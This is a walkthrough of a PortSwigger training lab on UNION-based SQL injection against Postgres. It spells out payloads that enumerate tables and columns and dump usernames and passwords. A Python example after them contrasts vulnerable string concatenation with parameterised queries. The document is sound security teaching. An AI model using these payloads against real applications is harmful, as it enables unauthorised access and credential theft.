Write-up: SQL injection attack, listing the database contents on non-Oracle databases @ PortSwigger Academy
This write-up for the lab SQL injection attack, listing the database contents on non-Oracle databases is part of my walkthrough series for PortSwigger’s Web Security Academy.
Learning path: Server-side topics → SQL injection
Python script: script.py
Lab description
Query
The query used in the lab will look something like:
SELECT * FROM someTable WHERE category = '<CATEGORY>'
Steps
The first steps are identical to the labs "SQL injection UNION attack, determining the number of columns returned by the query" and "SQL injection UNION attack, finding a column containing text", and are not repeated here.
As a result of these steps, I find out that the number of columns is 2, with both being string columns.
Find users table
The database in use here is Postgres (enumerated by injecting ' UNION SELECT null,version()--), which holds the table information in the information_schema.tables table. The relevant documentation lists the available columns; we are interested in table_name. So inject ' UNION SELECT table_name, table_schema from information_schema.tables-- into the parameter to form the following query:
SELECT * FROM someTable WHERE category='X' UNION SELECT table_name, null from information_schema.tables--'
I use an invalid category so that no articles are found and only my output appears.
Enumerate columns in this table
The information_schema.columns view holds information about the columns of each table, specifically in the column_name column. The proper string to inject is ' UNION SELECT column_name, null from information_schema.columns WHERE table_name = 'users_kcstmf'-- to form this query:
SELECT * FROM someTable WHERE category='X' UNION SELECT column_name, null from information_schema.columns WHERE table_name = 'users_kcstmf'--'
Enumerate all usernames and passwords
Now we have all the information needed to obtain the required usernames and passwords. Inject ' UNION SELECT username_spivdg, password_dfxmeh from users_kcstmf-- to form this query:
SELECT * FROM someTable WHERE category='X' UNION SELECT username_spivdg, password_dfxmeh from users_kcstmf--'
Now I simply log in to solve this exercise.
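As an added example that is not part of the original write-up or the lab, the root cause behind this whole chain and its fix side by side: the same category lookup built by string concatenation and with a bound parameter. It uses an in-memory SQLite database as a stand-in for the lab's Postgres backend (so the information_schema steps are not reproduced), with constructed rows in tables named like the ones in this write-up.

```python
import sqlite3

# Constructed in-memory database standing in for the lab's backend. The table
# and column names are taken from this write-up; the rows are made up.
def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE someTable (name TEXT, description TEXT, category TEXT)")
    conn.executemany("INSERT INTO someTable VALUES (?, ?, ?)", [
        ("Widget", "A widget", "Gifts"),
        ("Gadget", "A gadget", "Tech"),
    ])
    conn.execute("CREATE TABLE users_kcstmf (username_spivdg TEXT, password_dfxmeh TEXT)")
    conn.executemany("INSERT INTO users_kcstmf VALUES (?, ?)", [
        ("administrator", "s3cret"),
        ("wiener", "peter"),
    ])
    conn.commit()
    return conn

def vulnerable_lookup(conn, category):
    """Builds the lab's query by string concatenation: a quote in the input
    closes the literal and everything after it is parsed as SQL."""
    sql = "SELECT name, description FROM someTable WHERE category = '" + category + "'"
    return conn.execute(sql).fetchall()

def safe_lookup(conn, category):
    """Same query with a bound parameter: the driver passes the input as a
    value, so quotes, UNION and -- in it are never parsed as SQL."""
    sql = "SELECT name, description FROM someTable WHERE category = ?"
    return conn.execute(sql, (category,)).fetchall()

# The final payload from this write-up, as it arrives in the category parameter.
PAYLOAD = "X' UNION SELECT username_spivdg, password_dfxmeh from users_kcstmf--"

if __name__ == "__main__":
    conn = build_db()
    # Credentials appear in the product listing instead of products.
    print("vulnerable:", vulnerable_lookup(conn, PAYLOAD))
    # Empty: no category is literally named like the payload string.
    print("parameterised:", safe_lookup(conn, PAYLOAD))
    print("parameterised, normal input:", safe_lookup(conn, "Gifts"))
```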
Originally published at https://github.com.